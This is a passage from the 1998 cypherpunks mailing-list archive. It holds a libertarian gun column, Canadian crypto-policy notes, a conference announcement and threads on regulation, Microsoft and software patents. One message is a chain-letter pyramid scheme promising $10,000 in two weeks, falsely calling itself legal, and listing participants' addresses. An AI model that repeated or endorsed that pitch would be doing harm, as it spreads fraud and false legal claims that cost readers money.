Date: Wed, 30 Sep 1998 23:22:06 -0700 (PDT)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Oct 2 column - take them shooting
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/563
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED OCT. 2, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    'And every other terrible implement of the soldier'

    One of the great pleasures of collecting and restoring old firearms is
hauling them out to the range and letting a visitor find out just how good
some of our grandfathers' military engineering really was.

  It can be an even greater pleasure to introduce someone who's previously
been a "Second Amendment agnostic" to the exhilaration that comes with
learning how to safely and effectively handle these historic tools of
freedom. Suddenly some appreciation dawns of what it must have been like to
stand with the Minutemen on that town green in Lexington, or to dig the mud
or snow out of your action, slam in a clip, and carefully squeeze off eight
aimed rounds of 30.06 from the unstoppable Garand.

  These old-timers aren't dainty target rifles. You slam them closed with
the butt of your hand. The weight of steel across your arms, the crack of
bullets breaking the sound barrier (even through modern ear protection) are
sobering. Then, once the newcomer develops that cake-eating grin that comes
when you confirm it was him -- not the wind -- that really knocked down
those cans at 60 yards, you point waaaay down the wash, and explain that
the average infantryman was expected to hit a man-sized target over there,
at 300 yards ... that a marksman was expected to do so at 800.

  "You mean you can hit something out (start ital)there(end ital)? I can't
even (start ital)see(end ital) what's out there."

  "Yes. And I also mean that any trained soldier out there ... can hit you."

  Suddenly all this talk about banning "assault rifles" with "magazines
that hold more than 10 rounds," or rifles with bayonet lugs or flash hiders
(yes, that's why that collector's piece you're holding has been emasculated
with a hacksaw, like an antique table imported with only three legs) start
to come into focus.

  "They made them import this SKS without a bayonet? But they're obviously
designed to carry the folding bayonet, like this older one here. Without it
the cleaning rod rattles around and falls out. And how the heck does taking
off the bayonet make the weapon any less deadly in a shoot-out? Who thinks
up this stuff?"

  Any American can still learn to shoot safely, and then teach one more
person, and then another. It's wonderfully subversive.

  Recently, a fellow who I took out was moved to recall that his father had
qualified as a marksman in the army, but had died before he was able to
teach his son that skill. So pleased was he to start re-learning his
father's skill that he insisted on buying me dinner, to compensate me for
my ammo costs. Two weeks later, the lad who grew up without a father won
the Republican primary, and now stands a good chance of becoming our next
congressman. Good luck selling your victim-disarmament bill of goods to him
now, Ms. Feinstein, Mr. Schumer.


  #   #   #

  Of course, the downside of hauling a collection of arms out to the range
always faced you that evening, when a half-dozen rifles leaned waiting
against the wall, and you started figuring how long you were about to spend
with cleaning rods, powder solvent, jags and patches.

  (And if you find a woman who loves the smell of Hoppe's powder solvent in
her living room, fellows, marry her straight off.)

  Since this has been the fate of the rifleman for centuries, I will admit
it was with the standard "Yeah, right" that I first noticed an ad in one of
the firearms tabloids a few months back for a new product modestly named
the "World's Fastest Gun Bore Cleaner," a patented rayon pull-through cord
with phosphor-bronze bristles braided right into the front. Everyone knows
the only way to clean a rifle barrel is to brush it out with a cleaning
rod, run through cotton patches soaked in solvent, and then run through dry
patches to remove the black soot, repeating again and again in a
semi-hypnotic ritual of devotional labor. Pull some fancy cord once through
the gun and rack it away? Ha!

  Then I dropped by the Soldier of Fortune Expo here in Las Vegas last
month, and spotted a table full of these things, manned by the inventor,
who explained how he got to wondering -- as he was clearing out some
varmints in the frozen wilds of Idaho, cold enough to freeze your fingers
to the barrel -- why in this day of space-age materials no one had invented
a device that would clean a rifle barrel with one pull, no bent or broken
steel rods to haul around, no gouging of the rifle's delicate crown, no
chemicals.

  I bought one of the things -- which you can roll up and carry in your
shirt pocket -- and Bruce Hedge made me a gift of a second one to fit my
pistols (the Bore Cleaner is sized precisely by caliber), my total
"compensation" for this rare and unsolicited product endorsement.

  Because, you see, they work. After that precision-sized brush stutters
through (you want it to stutter -- that means the bristles aren't lying
over sideways because they're too long), the braided cord swipes your lands
and grooves with a surface area equivalent to 160 cotton patches. And when
the cord is dirty, you just wash it out in soapy water, to the tune of 200
to 500 uses.

  Mr. Hedge's biggest problem? Other than finding enough salesmen to move
his product, and butting up against some out-of-date military specs that
are so far keeping our men in uniform from capitalizing on this
breakthrough, that would be "setting aside the $100,000 we figure we're
going to need to protect the patent."

  As the man said, "This changes everything."

  The "World's Fastest Gun Bore Cleaner" is from National Tech-Labs, 5200
Sawyer, Suite H, Boise, Idaho 83714; tel. 208-345-5674. If you shoot, you
want some.

   #   #   #

"Congress have no power to disarm the militia. Their swords, (start
ital)and every other terrible implement of the soldier(end ital), are the
birth-right of an American." -- Tench Coxe, prominent Federalist and friend
of James Madison, The Pennsylvania Gazette, Feb. 20, 1788.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com.

***



Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 1 Oct 1998 10:53:33 +0800
To: cypherpunks@toad.com
Subject: Canada's Crypto Policy
Message-ID: <199810011545.LAA05835@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks to MC Taylor for pointing we offer a speech
today by Canada's Minister of Industry on a new
cryptography policy:

   http://jya.com/ca-crypto.htm  (16K)

It has links to several sites with related policies in the
works.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 1 Oct 1998 12:13:47 +0800
To: cypherpunks@cyberpass.net
Subject: [RRE]Conference: Technological Visions
Message-ID: <v0401173fb2396565a4b9@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



PhilZ Pontificates. Philm at 11.

Cheers,
Bob Hettinga

--- begin forwarded text


Mime-Version: 1.0
Date: Wed, 30 Sep 1998 21:43:09 -0800
To: "Red Rock Eater News Service" <rre@lists.gseis.ucla.edu>
From: duguid@socrates.berkeley.edu (Paul Duguid)
Subject: [RRE]Conference: Technological Visions
Sender: <rre@lists.gseis.ucla.edu>
Precedence: Bulk
List-Subscribe: <mailto:rre-on@lists.gseis.ucla.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News
Service (RRE).  Send any replies to the original author, listed in
the From: field below.  You are welcome to send the message along to
others but please do not use the "redirect" command. For information
on RRE, including instructions for (un)subscribing, see
http://dlis.gseis.ucla.edu/people/pagre/rre.html or send a message
to requests@lists.gseis.ucla.edu with Subject: info rre
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Date: Fri, 25 Sep 1998 23:41:21 +0200 (MET DST)
From: Kearney <kearney@scf-fs.usc.edu
Subject: Technological Visions: Utopian and Dystopian Perspectives

CONFERENCE ANNOUNCEMENT:

Technological Visions: Utopian and Dystopian Perspectives

A USC Annenberg Center for Communication convened by the Annenberg
Schools for Communication, University of Southern California and the
University of Pennsylvania

November 6 and 7, 1998 Davidson Conference Center, University of
Southern California

Technological Visions: Utopian and Dystopian Perspectives will bring
together journalists, academics, cyberculture advocates,
policymakers, and science fiction visionaries to examine how
technologies have been envisioned throughout history and the social
impact of new technologies. The conference will explore ways of
considering contemporary new technologies in light of how new
technologies were represented and debated in the past. It intends to
address the ahistorical nature of the public discourse of new
technology and to encourage discussion across the boundaries of the
social realms of academic, media, and industry on the impact of new
technologies.

Sherry Turkle, Professor of Sociology of Science at MIT and author
of Life on the Screen will give the keynote speech: Are the
discourses surrounding the Internet a better guide to social action
than those formulated in the early days of "old" technologies? Have
we learned anything from the successes and failures of past attempts
to predict what technology will do for us and to us?

Panels:

The Problems and Potentials of Prediction
Privacy and Censorship
Communities of Place and Cyberspace
Media Discourse on New Technology
Technological Visions

Confirmed Participants:

John Perry Barlow, Lord Asa Briggs, Richard Chabran, Bob Cringely,
Wendy Grossman, Katie Hafner, Larry Irving, Peter Lyman, Carolyn
Marvin, David Nye, Mitchel Resnick, Romelia Salinas, Vivian
Sobchack, Lynn Spigel, Sherry Turkle, Langdon Winner, Philip
Zimmermann

Conference Organizers: Sandra Ball-Rokeach, Marita Sturken,
Douglas Thomas, Annenberg School for Communication

Conference Information:

The conference is free and open to the public. It will be held at
the Davidson Conference Center on the USC campus in downtown Los
Angeles. The conference proceedings will be simulcast on the
Metamorphosis web site.

For further information and updated schedules: www.metamorph.org

For more information, contact:

Douglas Thomas
(213) 740-3937
douglast@usc.edu

Marita Sturken
(213) 740-3950
sturken@usc.edu

-----------------------------------------------------------------------------
Paul Duguid
Social & Cultural Studies
University of California, Berkeley
duguid@socrates.berkeley.edu
Tel: 510 848 1843
Fax: 510 540 0347

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 1 Oct 1998 13:11:09 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: I thought of an initialy regulated industry!... (fwd)
Message-ID: <199810011813.NAA19365@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Oct 1998 10:46:05 -0700
> From: Tim May <tcmay@got.net>
> Subject: Re: I thought of an initialy regulated industry!...

My original quote:

> >I'd like to hear from any free market mavens who might want to use the
> >nuclear industry as an example of how things could be so much better with no
> >regulation regarding construction, operation, or waste disposal.

Partial quote of Tim:

> "Regulation" of the nuclear power industry had the predicted effect of
> overly conservative designs being standardized. Specifically, the
> Westinghouse boiling water designs, basically frozen in 1955 and little
> changed since then.
> 
> Ordinary evolutionary improvement, plus revolutionary improvement, has not
> been possible. (Some examples would include inherently fail-safe designs
> like the Canadian CANDU reactor, and various improvements the French have
> made in the original Westinghouse design.)

Ok. I agree that over-regulation is bad. CCCP, China, Cuba, etc. are clear
examples of how over-regulation is a failure.

However, my question was to defend the free-market position that *no*
regulation provides an improved environment for (in this case) reactor
design.

Apples and oranges...


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jenny672@usa.net
Date: Thu, 1 Oct 1998 15:30:49 +0800
To: cypherpunks@toad.com
Subject: Been there....Done that....
Message-ID: <199810012014.NAA03876@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend,


I want to share this with you, I am sure like me you have tried many
different opportunities at home and most of them don't work, or they want
more money than we can afford. I figured what's $5 when we have spent so
much more.....

Need some fast cash? Try this:

*******************************************************************
If you are prepared to read on, BE PREPARED TO GET EXCITED...YOU
WON'T BE DISAPPOINTED!

*******************************************************************
Read the following and you will agree this is a very exciting
opportunity. Only invest a little bit of time and your reward could
mean thousands of dollars! Good luck!

*********************************************************************

$$$ ARE YOU IN NEED OF MONEY? RIGHT NOW? $$$
$$$ HOW DOES US$10,000 IN TWO(2) WEEKS (or less) SOUND? $$$

Don't laugh! This a very logical and rewarding opportunity! 
One(1) hour of work to get started and NO MAILING LISTS!

--------Esquire Marketing Newsletter Gift Club--------

*********************************************************************

If you need to make a few thousand dollars REALLY FAST, then please take
a moment to read this simple program I am sharing with you. No, it is
NOT what you think! YOU DO NOT have to send $5.00 to five people to buy
a report, buy a recipe, or any other product. Nor will you need to
invest more money later to get things going. THIS IS THE FASTEST,
EASIEST PROGRAM YOU WILL EVER DO! Complete it in ONE HOUR and you will
never forget the day you first received it. 

--------This Is How It Works--------

Unlike many other programs, this three-level program is more realistic
and much, much faster. Because it is so easy, the response rate for this
program is VERY HIGH and VERY FAST, and you will see results in two
weeks or less! Just in time for next month's bills!

You only mail out 20 copies ( not 200 or more as in other programs). You
should also try to send them to PEOPLE WHO SEND YOU THEIR PROGRAMS
because they know THESE PROGRAMS WORK and they are already believers
in the system! Besides, this program is much, much FASTER and has a HIGHER
RESPONSE RATE.

Even if you are already in a similar program, STAY WITH IT, but do yourself a
favor and DO THIS ONE as well. START RIGHT NOW! It's simple and takes
a very small investment. It will pay off long before other letters even
begin to trickle in!

Just give ONE person a US $5.00 gift. That' s all!

Follow the simple instructions and in TWO WEEKS you will have US $10,000
in your bank account!!! Because of the LOW INVESTMENT, SPEED and HIGH
PROFIT POTENTIAL, this program has a VERY HIGH RESPONSE RATE. JUST
ONE (1) US$5.00 BILL. THAT'S YOUR INVESTMENT!

+------+ Follow These Simple Instructions +------+

1. On a blank sheet of paper write "Please add me to your mailing list."
Write your name and address clearly and include your Email address (if
you have one) for future mailings and courtesy follow ups. Fold it
around a US $5 bill and send this to the FIRST name on the list (#1).
Only the FIRST PERSON on the list gets YOUR NAME AND A FIVE DOLLAR
GIFT.

Note: This is a service and is 100% legal (Refer to US Postal & Lottery
Laws, Title 18, Sections 1302 and 1341 or Title 18, Section 3005 in the
US Code, also in the Code of Federal Regulations, Volume 16, Sections
255 and 436, which state that "a product or service must be exchanged
for money received.")

2. Retype the list ONLY, REMOVING the FIRST (#1) NAME FROM THE LIST.
Move the other two names UP and ADD YOUR NAME to the list in the
THIRD(#3) position.

3. Send out 20 copies of this letter. Note: By sending this letter via
Email, the response time is much faster and you save the expense of
envelopes, stamps, and copying services. Consider this, MILLIONS of
people "surf the Internet" everyday, all day, all over the World! FIFTY
THOUSAND new people get on the Internet every month! An excellent
source of names is the people who send you other programs, and the names
listed on the letter they send you. Your contact source is UNLIMITED.
It boggles my mind to think of all the possibilities! Mail, or should I
say Email, your letter TODAY! It's so easy,
ONE HOUR of your time. THAT'S IT!

To send your newsletter by Email:

1. Go to "Edit" and "Select All"
2. Go to "Edit" and "Copy"
3. Start (compose) a new Email message
4. Address your Email and Subject Blocks
5. Go to "Edit" and "Paste"

After you have pasted this article in your new Email, delete the old
header and footer (Subject, Date, To, From, Etc..). Now you can edit
the names and addresses with ease. I recommend deleting the top name,
adding your name and address to the bottom of the list, then simply
changing the numbers.

THERE IS NOTHING MORE TO DO. When your name reaches the first position
in a few days, it will be your turn to collect your gifts. The gifts
will be sent to you by 1,500 to 2,000 people like yourself, who are
willing to invest US$5.00 and one hour to receive US$10,000 in cash.
That s all! There will be a total of US$10,000 (or more) in US$5.00
bills in your mailbox in two weeks.
US$10,000 for an hour's work! I think it s WORTH IT, don t you?

GO AHEAD -- TRY IT. IT'S US$5.00! EVEN IF YOU JUST MAKE 3 OR 4
THOUSAND, WOULDN'T THAT BE NICE?! IF YOU TRY IT, IT WILL PAY!!!!

--------TRUE STORY--------

Cindy Allen writes: I ran this gift summation four times last year.
The first time I received over $7,000 in cash in less than two weeks and
over $10,000 in cash in the next three times I ran it. I can't begin to
tell you how great it feels not to have to worry about money anymore!
I thank God for the day I received this letter! It has truly changed my
life! Don t be afraid to make gifts to strangers, they'll come back to
you ten-fold. So, let's keep it going and help each other in these "tough
and uncertain times."

Many of us just want to pay off our bills, buy a new car or buy a new
home for our family. Whatever your reasons or needs are, this program
worked for Cindy and thousands of others (just like you and I) time and
time again! THIS PROGRAM CAN AND WILL WORK FOR YOU!!!

--------Can I Do It Again? --------

OF COURSE YOU CAN...This plan is structured for everyone to send only
twenty(20) letters each. However, you are certainly not limited to
twenty. Mail out as many as you can. Every twenty letters you send has
a return to you of $10,000 or more. If you can mail forty, sixty,
eighty, or whatever, GO FOR IT! THE MORE YOU PUT INTO IT, THE MORE YOU
GET OUT OF IT!

Each time you run this program, just follow the steps (1) through (3)
and everyone on your gift list benefits! Simple enough? You bet it is!
Besides, there are no mailing lists to buy (and wait for), no further
trips to the printer or copiers, and you can do it again and again with
your regular group of gifters, or start up a new group. Some people
produce a mailing list of opportunity seekers and send out 200 or more.
Why not? It beats working! Each time you receive a MLM offer in the
mail, respond with THIS letter! Your name will climb to the number one
position at dizzying geometric rates.

Follow the simple instructions and above all, please "PLAY FAIR."

That's the key to this program's success. Your name must run the "full
gamut" on the list to produce the end results. "Sneaking" your name
higher up on the list WILL NOT produce the results you think, and it
only cheats the other people who have worked hard and earned the right
to be there. So please, play by the rules and the $$,$$$ will come to
you!!!

--------Mail Your Letters Out Today--------

$$$ TOGETHER, WE WILL ALL PROSPER $$$

Mail your US$5.00 "Gift" to the first name on the list ONLY. Remove the
first name and move the other two up one place and put your name in the
#3 position.

GOOD LUCK!!!


************************************************************************

1. G.U
PO Box 1437
Monterey Park, CA 91754

2. Jorge S.
40 Newport Pkwy
Apt. 214
Jersey City, NJ 07310 

3. Sun Prod
1350 E. Flamingo Rd. suite #426
Las Vegas, NV  89119   

*******************************************************************
Remember your total cost for participation is only $5.32
$5 gift and 32 cent stamp to mail it. Email this today to people
that need an extra income fast.....thanks.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Thu, 1 Oct 1998 14:40:27 +0800
To: "Cypherpunks Distributed Remailer" <cypherpunks@einstein.ssz.com>
Subject: Rain in Death Valley
In-Reply-To: <199810011932.OAA20010@einstein.ssz.com>
Message-ID: <000001bded72$f7c55000$8a2580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



If the area you refer to is below sea-level, where would the hard-rains
runoff run off to?

X

~> -----Original Message-----
~> From: owner-cypherpunks@minder.net
~> [mailto:owner-cypherpunks@minder.net]On Behalf Of Jim Choate
~> Sent: Thursday, October 01, 1998 1:32 PM
~> To: Cypherpunks Distributed Remailer
~> Subject: Re: I thought of an initialy regulated industry!... (fwd)
~>
~>
~> Forwarded message:
~>
~> > Date: Thu, 1 Oct 1998 21:22:24 +0200
~> > From: Anonymous <nobody@replay.com>
~> > Subject: Re: I thought of an initialy regulated industry!...
~>
~> > > Personally, I favor the "Pournelle Solution": acquire a
~> 10-mile by 10-mile
~> > > region of the Mojave Desert. Not in an "ecologically
~> interesting" area of
~>
~> As was pointed out it does rain out there. Though there is a
~> more insidious
~> issue that makes such attempts worthless.
~>
~> Here's how it works...
~>
~> Humidity in the air settles on the materials. Because of the daily
~> temperature extremes the expansion of this water causes the materials to
~> break into very small particles. The wind comes along and
~> transports these
~> particles downwind.
~>
~> I'll leave the rest to your imagination and a couple of hours
~> with a geology
~> text on erosion.
~>
~>
~>     ____________________________________________________________________
~>
~>                             The seeker is a finder.
~>
~>                                      Ancient Persian Proverb
~>
~>        The Armadillo Group       ,::////;::-.          James Choate
~>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
~>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
~>                            -====~~mm-'`-```-mm --'-
~>     --------------------------------------------------------------------
~>
~>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 1 Oct 1998 17:16:07 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
Message-ID: <33CCFE438B9DD01192E800A024C84A1928471F@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> I'd say the obvious one, the Unix code tree is more stable 
> than the MS tree.

Sure, but does that mean the MS platform was less suitable than Unix, or
their MS platform programmers were inferior to their Unix counterparts.
I believe Netscape outsourced the Unix development, at least initially.
I would blame insufficient SQA at Netscape, and from what I've heard
that claim is justified.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 14:18:56 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284710@mossbay.chaffeyhomes.com>
Message-ID: <v04011701b239821d8135@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:25 PM -0500 9/30/98, Matthew James Gering wrote:
>Petro wrote:
>> >> Had Microsoft, for example, been required to publish their
>> >> API's by the market we wouldn't be spending all this effort
>>    ^^^^^^^^^^^^^^^^^^^
>>
>> >You state free-market and then you are *requiring* someone to
>> >do something? How do you resolve that contradiction? Require
>> >= Force != Free[dom]
>>
>> Required as in purchasers large and small saying "You
>> don't include your source code, we won't buy it".
>
>*Require* per say is a bad term for the use of economic power. But the
>market didn't "require" Microsoft to do so (see Microsoft's financial
>statements), so why should the government step in and force something
>that is contrary to the market?

	I never said they should, however in this case I will make the
arguement that the Feds DID have something to do with creating the
Jaggernaut called M$, and that they could also fix Billys little redmond
wagon without a court case shoud they wish.

	Again, for those on the list who can't read clearly, I DON'T THINK
THE DOJ SUIT IS PROPER, I am against it.

	Of course that is true of most government "actions".

>The rest of Jim's sentence read "we wouldn't be spending all this effort
>and money on the current [Department of Justice] proceedings."
>
>Which tells me that require means certain segments of the market telling
>Microsoft you will do this or we will fuck you over with the borrowcrats
>we own, which is exactly what has happened. The elements lacked
>sufficient economic power to sway Microsoft, and they lacked sufficient
>political power until they ganged up together. A loose coalition to gain
>via use of DOJ antitrust force what they good not gain in a free market.
>That is political power, not economic.
>What is rather ironic is that the same Antitrust laws they are trying to
>bash Microsoft with are what prevented them from forming an economic
>(instead of under-the-table political) coalition that could have made
>Microsoft change its practices without resorting to non-free-market
>forces.

	Correct me if I am wrong, but aren't almost all Federally owned
desktop computers PCs?

	Aren't there certain departments/divisions in the governement that
only accept electronic files if they are in "word" format? (i.e. the DoD,
but I don't have a site for that, so I could be mistaken).

	I know that I've never seen a Military Computer (desktop kind) that
wasn't a Wintel/Dos machjne (talking general purpose computer here, not a
targeting machine etc.)

	Sell a couple hundered thousand units to the Feds, and that is a
considerable dent in the "level playing field" of the free market.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M Taylor <mctaylor@privacy.nb.ca>
Date: Thu, 1 Oct 1998 12:09:52 +0800
To: efc-talk@efc.ca
Subject: [Cdn] Cryptography Policy Discussion Paper: Analysis of Submissions
Message-ID: <Pine.LNX.3.95.981001135456.19914C-100000@privacy.nb.ca>
MIME-Version: 1.0
Content-Type: text/plain



An analysis of responses to The Canadian Cryptography Policy Discussion
Paper (http://strategis.ic.gc.ca/SSG/cy00005e.html)

Prepared by:    AEPOS Technologies Corporation
Prepared for:   Industry Canada
Originator :    AEPOS Technologies Corporation
                116 Albert St. Suite 601
                Ottawa, Ontario
                K1P 5G3

Date :          15 September, 1998

English: http://strategis.ic.gc.ca/SSG/cy01156e.html
French: http://strategis.ic.gc.ca/SSGF/cy01156f.html


It appears is light of today's announcement
<http://info.ic.gc.ca/cmb/welcomeic.nsf/558d636590992942852564880052155b/85256613004a2e1785256690004c70fb?OpenDocument>
by John Manley, Minister of Industry, that domestic cryptography will
bloom, but the export of Canadian crypto is not yet clear. I suspect the
Wassenaar negotiations will determine whether the free export of "public
domain" and mass market software will continue for Canadians. As an
exporter, I hope so.

-mctaylor
--
M Taylor   mctaylor@  /  glyphmetrics.ca | privacy.nb.ca






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 1 Oct 1998 08:18:24 +0800
To: coderpunks@toad.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source co	de)
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8468@MSX11002>
Message-ID: <36137FFC.E0A860AB@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Brown, R Ken wrote:
> 
> I suspect there are a lot of people who would have moral problems with
> breaking someone else's software copyright but wouldn't give a dam about
> breaking a software patent. An algorithm is an idea, and how can anyone own
> an idea? (I'm talking morals here, not law - intersecting universes of
> discourse, but not identical ones :-)

But sadly in matters of law there are software patents and particularly
in cryptography. One may have different opinions on crypto patents
and endlessly debate on them. My personal opinion is that the
benefits of crypto patents do not outweigh their negative impacts
on the development and use of cryptography especially in view of 
the fact that a number of governments intend to suppress civilian 
usage of strong crypto with all means that they can think of.

I think that claiming copyright is a good idea, since one retains
some kind of control over the stuff that one creates. One can then 
say that copying is allowed for certain usages but disallowed in 
others. (As far as I know copying some pages from a book, but not
the whole, for scientific purposes is free generally.) 

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 14:30:25 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: advertisement (fwd)
In-Reply-To: <199810010059.TAA15358@einstein.ssz.com>
Message-ID: <v04011702b239859150eb@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:59 PM -0500 9/30/98, Jim Choate wrote:

>
>Computers are *supposed* to make our lives *easier*. Some folks seem to have
>forgotten this.

	It's making the spammers lives easier.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Elliott <k-elliott@wiu.edu>
Date: Thu, 1 Oct 1998 14:34:54 +0800
To: Cypherpunks <cypherpunks@cyberpass.net>
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A1928471D@mossbay.chaffeyhomes.com>
Message-ID: <v04011701b239835d0cca@[143.43.245.6]>
MIME-Version: 1.0
Content-Type: text/plain



Said Matthew James Gering,

>Bullshit, monopolies exist because of the regulation.

I'm afraid sir, that your ingonorance is showing.  Pick up any college
(hell, high school) ecomonics textbook.  Certain types of businesses are
inheritly advantagious to monopolies.  The electric company is the classic
example- their is no cost effective way for an electric company to supply
power to a given area unless it is a monopoly.  Certain types of businesses
are suited to certain types of competition, and, unregulated, monopolies
are exactly what you get.  This was exactly the situation that occured at
the turn of the century and it happened because regulation was
non-existant!  Your statement is wonderfully trite but I see no evidence to
support it.



___________________________________________________________________________
"DOS/WIN based computers manufactured by companies such as IBM, Compaq,
Tandy, and millions of others, are by far the most popular, with about 70
million machines in use worldwide. Macintosh fans, on the other hand, note
that cockroaches are far more numerous than humans, and that numbers alone
do not denote a higher life form." - New York Times

-Kevin "The Cubbie" Elliott <mailto:k-elliott@wiu.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Thu, 1 Oct 1998 14:27:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [RRE]Conference: Technological Visions
In-Reply-To: <v0401173fb2396565a4b9@[139.167.130.248]>
Message-ID: <v03102802b23987fefd5d@[192.168.3.63]>
MIME-Version: 1.0
Content-Type: text/plain



>Y2K: A good chance to reformat America's hard drive and empty the trash.

If you reformat the drives, there's no need to empty the trash.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 1 Oct 1998 14:41:05 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: GPL & commercial software, the critical distinction (fwd)
In-Reply-To: <199810010207.VAA15977@einstein.ssz.com>
Message-ID: <v04011703b239868e8c60@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:07 PM -0500 9/30/98, Jim Choate wrote:
>Forwarded message:
>
>> From: Matthew James Gering <mgering@ecosystems.net>
>> Subject: RE: GPL & commercial software, the critical distinction (fwd)
>> Date: Wed, 30 Sep 1998 18:24:02 -0700
>
>> Jim Choate wrote:
>> > The reality is that we don't live in a free-market, but
>> > rather a rather lightly regulated one.
>>
>> Lightly? You jest.
>
>No I don't. I can start a business for as little as $15 to register a DBA
>and I don't need licenses or other sorts of regulatory permissions. If I
>sell a product or service (some are exempt, check your local area) I'll need
>a tax number to pay my state sales tax (though they do nothing to regulate
>my business other than specify that I must pay x% of my sales to the
>community). Getting that tax number is free. Outside of that (at least in
>Texas) I'm ready to go.

	That does not apply to very many business at all. Most are rather
heavily regualted, and state regulations in some places can be extremely
onerous.

>Yep, that's a lot of regulation, no forms or permission slips from some
>in loco parentis, no reports or annual fees.

	Unless you have a partner, or an employee, or a need to incorporate.

